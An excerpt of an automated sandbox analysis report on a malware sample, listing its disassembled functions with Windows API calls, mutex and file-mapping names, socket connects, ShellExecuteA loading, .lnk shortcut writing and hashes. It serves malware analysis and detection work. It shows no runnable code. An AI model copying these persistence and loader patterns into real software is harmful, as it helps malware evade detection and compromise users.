                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CloseFindSleep
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1358061995-0
                                                                                                                                                                                                                                    • Opcode ID: d2be57a4a7ff4bd43d29c59855e722db78269e3084de1171d332e0caa0f9abc4
                                                                                                                                                                                                                                    • Instruction ID: 38f85d81a26db32a1aae3bc70cca96189ee588b623b1a404934644e7db981dba
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d2be57a4a7ff4bd43d29c59855e722db78269e3084de1171d332e0caa0f9abc4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A5E08C7AA00209CFCF20CF98E8497ADB770FB8C322F108369DA15A32C0C7391421CBA0
                                                                                                                                                                                                                                    Function 0129377A Relevance: 2.6, APIs: 2, Instructions: 111sleepmemoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,0001F200), ref: 012937F4
                                                                                                                                                                                                                                      • Part of subcall function 01292FFF: CreateFileA.KERNEL32(0129382E,40000000,00000002,00000000,00000004,00000020,00000000,?,0129382E), ref: 0129302B
                                                                                                                                                                                                                                      • Part of subcall function 01292FFF: WriteFile.KERNEL32(000000FF,012626B0,00000401,00000000,00000000), ref: 0129304E
                                                                                                                                                                                                                                      • Part of subcall function 01292FFF: CloseHandle.KERNEL32(000000FF), ref: 01293058
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00004E20), ref: 01293852
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$AllocCloseCreateGlobalHandleSleepWrite
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 653111876-0
                                                                                                                                                                                                                                    • Opcode ID: 7e900ad23adb76f9f4c1eaf6fc33fd41ae9cd20a76dbe79cc345c30aa4bbcaca
                                                                                                                                                                                                                                    • Instruction ID: 4e07e1fefad91927d20dfc11edbddc706514ec1a6f4cd10494ec6ffe9abf6513
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e900ad23adb76f9f4c1eaf6fc33fd41ae9cd20a76dbe79cc345c30aa4bbcaca
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF419AB2920154ABDB24D768DC51BE973B9BB68300F0045E5E74DA7280DBB56F84CF91
                                                                                                                                                                                                                                    Function 012858E9 Relevance: 1.5, APIs: 1, Instructions: 29registryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 01285983
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 01285AF0
                                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000004), ref: 01285B2D
                                                                                                                                                                                                                                    • RegCloseKey.KERNEL32(00000000), ref: 01285BFB
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: wsprintf$CloseQueryValue
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2158237808-0
                                                                                                                                                                                                                                    • Opcode ID: e54fdc0021a9e18b2a5f3699416ea66b5f1ddda9053053e5cd270d50072c8ac7
                                                                                                                                                                                                                                    • Instruction ID: e812403f0793931f0ceb63a40f46294edf18f90cbd92d6b276683a1b83f84f34
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e54fdc0021a9e18b2a5f3699416ea66b5f1ddda9053053e5cd270d50072c8ac7
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 47F0E730A12119DBCB24EF88E9C87A9F7B5AF48319F1481D9D909A7291D7749A80CF44

                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                    Function 0128B614 Relevance: 4.5, Strings: 3, Instructions: 792COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CountExchangeInterlockedTick
                                                                                                                                                                                                                                    • String ID: x$z${
                                                                                                                                                                                                                                    • API String ID: 3499635708-1334427886
                                                                                                                                                                                                                                    • Opcode ID: f81402154c637fa41e8b7436ecc3f13e409c610f9ad9dbd77e871829a4956cda
                                                                                                                                                                                                                                    • Instruction ID: 0199514c42e8c992311bc353a7ad5aec69b438852a326937e91032d2243b69fe
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f81402154c637fa41e8b7436ecc3f13e409c610f9ad9dbd77e871829a4956cda
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28624DB1D2210ADFDF14EF98C981AAE77B1FF98304F24821DE515A7380D734AA55CBA1
                                                                                                                                                                                                                                    Function 01296CD0 Relevance: .2, Instructions: 186COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: d9aff8e00a7f71b2b17fef87b6229ed2804c3dd8e6d7691759069b8ba1df6b48
                                                                                                                                                                                                                                    • Instruction ID: 30dcd82b95610d0de59494901b1336f35deac4b1cd4147000e6a72575b19cf96
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d9aff8e00a7f71b2b17fef87b6229ed2804c3dd8e6d7691759069b8ba1df6b48
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17711970E1414A8BDF09CF6DC5507BEBBF2AF89304F18C069DA56AB341D6359A42CB90
                                                                                                                                                                                                                                    Function 0130D765 Relevance: 36.9, APIs: 12, Strings: 9, Instructions: 162libraryfilesleepCOMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LoadLibraryExA.KERNELBASE(KERNEL32.DLL,00000000,00000000), ref: 0130D831
                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00008002), ref: 0130D858
                                                                                                                                                                                                                                    • CreateFileMappingA.KERNEL32(-00000001,00000000,00000004,00000000,00008000,hh8geqpHJTkdns6), ref: 0130D872
                                                                                                                                                                                                                                    • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00015400,purity_control_7728), ref: 0130D88C
                                                                                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00015400), ref: 0130D8A2
                                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,0130EED8,000001FE), ref: 0130D935
                                                                                                                                                                                                                                    • LoadLibraryExA.KERNELBASE(SHELL32.DLL,00000000,00000000), ref: 0130D954
                                                                                                                                                                                                                                    • GetProcAddress.KERNELBASE(00000000,ShellExecuteA), ref: 0130D962
                                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,Ap1mutx7), ref: 0130D98F
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 0130D996
                                                                                                                                                                                                                                    • Sleep.KERNEL32(000927C0), ref: 0130D9A5
                                                                                                                                                                                                                                    • ExitProcess.KERNEL32(00000000), ref: 0130D9AD
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$Create$ErrorLibraryLoadMapping$AddressExitLastModeModuleMutexNameProcProcessSleepView
                                                                                                                                                                                                                                    • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
                                                                                                                                                                                                                                    • API String ID: 3566498206-162185446
                                                                                                                                                                                                                                    • Opcode ID: 4dfdd8c8ea759f40701b5fec77ac64174a416b025a1b0df71bc92e610429bfa5
                                                                                                                                                                                                                                    • Instruction ID: 4a0fc2bf3bff6c3bacb2b009b8b18fd6ed66cf12347dd77fd76653d736addf8d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4dfdd8c8ea759f40701b5fec77ac64174a416b025a1b0df71bc92e610429bfa5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9B618E31640289ABEF11DFE4CC59FEA3BE9EF04B09F040415EE0DBE1E0D6B166448B5A
                                                                                                                                                                                                                                    Function 01289706 Relevance: 25.7, APIs: 17, Instructions: 245librarystringmemoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32(00000000,000000F8), ref: 0128976E
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 0128977B
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,01283C94), ref: 0128979A
                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 012897CD
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 0128983B
                                                                                                                                                                                                                                      • Part of subcall function 0128A75A: GetTempPathA.KERNEL32(00000080,00000000,?), ref: 0128A78C
                                                                                                                                                                                                                                      • Part of subcall function 0128A75A: lstrlen.KERNEL32(00000000), ref: 0128A796
                                                                                                                                                                                                                                      • Part of subcall function 0128A75A: lstrcat.KERNEL32(00000000,01283CC0), ref: 0128A7B2
                                                                                                                                                                                                                                      • Part of subcall function 0128A75A: lstrcpy.KERNEL32(00000000,00000000), ref: 0128A7CF
                                                                                                                                                                                                                                      • Part of subcall function 0128A75A: lstrlen.KERNEL32(00000000,01282880,00000000), ref: 0128A7FD
                                                                                                                                                                                                                                      • Part of subcall function 0128A75A: wsprintfA.USER32 ref: 0128A809
                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 01289860
                                                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000001), ref: 01289875
                                                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000001), ref: 01289895
                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 012898B8
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,01282294), ref: 012898CB
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: lstrcatlstrlen$GlobalLibraryLoad$AddressAllocCopyDirectoryFileFreePathProcSystemTemplstrcpywsprintf
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1023114332-0
                                                                                                                                                                                                                                    • Opcode ID: 32930c000e7ca76ee1ba9aebf4f7df04fc63c5ebe3dae262f59b6f56cceff8b1
                                                                                                                                                                                                                                    • Instruction ID: 3be53ba29610506d9acaeb8558d29d8bcb297f64ef0367374692f462c9128867
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 32930c000e7ca76ee1ba9aebf4f7df04fc63c5ebe3dae262f59b6f56cceff8b1
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 18B11B74A11219EFDF24EF64DC89BEDB7B5EB88304F1085D8E609A7294D774AA80CF50
                                                                                                                                                                                                                                    Function 01287C4E Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 161networksleepCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • socket.WS2_32(00000002,00000001,00000006), ref: 01287C83
                                                                                                                                                                                                                                    • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 01287CD8
                                                                                                                                                                                                                                    • connect.WS2_32(000000FF,00000002,00000010), ref: 01287CEB
                                                                                                                                                                                                                                    • WSAGetLastError.WS2_32 ref: 01287D05
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000032), ref: 01287D1F
                                                                                                                                                                                                                                    • select.WS2_32(000000FE,00000000,00000000,00000000,00000000), ref: 01287E79
                                                                                                                                                                                                                                    • ioctlsocket.WS2_32(000000FF,8004667E,00000000), ref: 01287EE6
                                                                                                                                                                                                                                    • closesocket.WS2_32(000000FF), ref: 01287EFB
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ioctlsocket$ErrorLastSleepclosesocketconnectselectsocket
                                                                                                                                                                                                                                    • String ID: 3'$@$@
                                                                                                                                                                                                                                    • API String ID: 3016611618-2553492011
                                                                                                                                                                                                                                    • Opcode ID: a214526164c9eb187272b42a89a961ffbd9bcf805364577421791dc4ab0c58c7
                                                                                                                                                                                                                                    • Instruction ID: 32e96b40ecc052eb8449f1a5aa45c35a4ab621f3433e3d7c29f0385d0584f59f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a214526164c9eb187272b42a89a961ffbd9bcf805364577421791dc4ab0c58c7
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF715675925229CBDB34EF14DC88BE9B371BB64304F2086D9D18AA62C0D7B46EC0CF50
                                                                                                                                                                                                                                    Function 01290E71 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 128stringfileCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,?), ref: 01290EF4
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 01290F21
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,.lnk), ref: 01290F43
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?), ref: 01290F70
                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 01290F8C
                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000020,00000000), ref: 01290FA8
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 01290FC8
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 01290FFB
                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0129103B
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 01291048
                                                                                                                                                                                                                                      • Part of subcall function 012844CB: InterlockedExchange.KERNEL32(012990C0,0128A192), ref: 012844E9
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: lstrlen$Filelstrcat$ByteCharCloseCreateExchangeHandleInterlockedMultiWideWritelstrcpy
                                                                                                                                                                                                                                    • String ID: .lnk
                                                                                                                                                                                                                                    • API String ID: 2963584520-24824748
                                                                                                                                                                                                                                    • Opcode ID: 4827352efc19597bde00025d8f9bf19421523452960e1c8a8f8cf443bbe38a0d
                                                                                                                                                                                                                                    • Instruction ID: 6a4861b42f2391d7e6bd96ca99e976c386bc1756c511699811e90b451b019f0b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4827352efc19597bde00025d8f9bf19421523452960e1c8a8f8cf443bbe38a0d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED41A5B691021DABDB21DB58DC49BEA77B9FB48701F04C5E8F309A61D0DB746B888F50
                                                                                                                                                                                                                                    Function 0130D9C0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 52librarysleeploaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,0130EED8,000001FE), ref: 0130D935
                                                                                                                                                                                                                                    • LoadLibraryExA.KERNELBASE(SHELL32.DLL,00000000,00000000), ref: 0130D954
                                                                                                                                                                                                                                    • GetProcAddress.KERNELBASE(00000000,ShellExecuteA), ref: 0130D962
                                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,Ap1mutx7), ref: 0130D98F
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 0130D996
                                                                                                                                                                                                                                    • Sleep.KERNEL32(000927C0), ref: 0130D9A5
                                                                                                                                                                                                                                    • ExitProcess.KERNEL32(00000000), ref: 0130D9AD
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressCreateErrorExitFileLastLibraryLoadModuleMutexNameProcProcessSleep
                                                                                                                                                                                                                                    • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
                                                                                                                                                                                                                                    • API String ID: 1721171764-1163154406
                                                                                                                                                                                                                                    • Opcode ID: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
                                                                                                                                                                                                                                    • Instruction ID: 00e817fd631518231616da5d089cda40b8a064a9adf508037919a9174385179b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6011DB71244289ABEF51DEE48D1DFED37E9AB84B05F440415FA09EE0E0DAB19204876B
                                                                                                                                                                                                                                    Function 05B30260 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 52librarysleeploaderCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,05B31778,000001FE), ref: 05B301D5
                                                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(SHELL32.DLL,00000000,00000000), ref: 05B301F4
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ShellExecuteA), ref: 05B30202
                                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,Ap1mutx7), ref: 05B3022F
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 05B30236
                                                                                                                                                                                                                                    • Sleep.KERNEL32(000927C0), ref: 05B30245
                                                                                                                                                                                                                                    • ExitProcess.KERNEL32(00000000), ref: 05B3024D
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2249113471.0000000005B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B30000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_5b30000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressCreateErrorExitFileLastLibraryLoadModuleMutexNameProcProcessSleep
                                                                                                                                                                                                                                    • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
                                                                                                                                                                                                                                    • API String ID: 1721171764-1163154406
                                                                                                                                                                                                                                    • Opcode ID: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
                                                                                                                                                                                                                                    • Instruction ID: 8bc290a5b4cbb6164913b35893ec34d1d830a75f3d1492a722f8822534afd078
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9011D271284289ABEF51EEA08D4EFE93759EF44B05F444415BA09FD0D0DAB1A244876B
                                                                                                                                                                                                                                    Function 01290CF6 Relevance: 18.1, APIs: 12, Instructions: 115filememoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000020,00000000), ref: 01290D32
                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(?,00000000), ref: 01290D4B
                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 01290D6D
                                                                                                                                                                                                                                    • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 01290D88
                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000020,00000000), ref: 01290DCC
                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(?,00000000), ref: 01290DE1
                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 01290DFF
                                                                                                                                                                                                                                    • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 01290E1A
